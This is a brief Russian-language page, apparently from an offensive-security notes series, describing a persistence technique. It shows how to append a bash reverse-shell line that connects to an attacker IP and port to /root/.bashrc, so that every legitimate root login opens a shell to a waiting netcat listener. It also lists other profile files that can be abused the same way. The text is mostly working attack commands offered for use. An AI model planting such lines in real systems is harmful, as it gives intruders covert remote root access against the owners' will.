03 - bashrc

Мы модифицируем рутовый bashrc так, что каждый раз когда легитимный root будет логиниться, мы будем получать reverse shell. То же самое можно проделывать с: ~/.bash_profile ~/.bash_login ~/.profile /etc/profile /etc/profile.d /etc/bash.bashrc Тут отличный онлайн Reverse Shell Generator

// на атакуемом хосте добавляем строку в /root/.bashrc
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1

// На хосте атакующего запускам netcat 
nc -lvp 9010

Теперь как только кто то залогиниться под учеткой root, мы получим шелл

Previous02 - ПсевдоROOT аккаунт Next04 - Cron Jobs

Last updated 8 months ago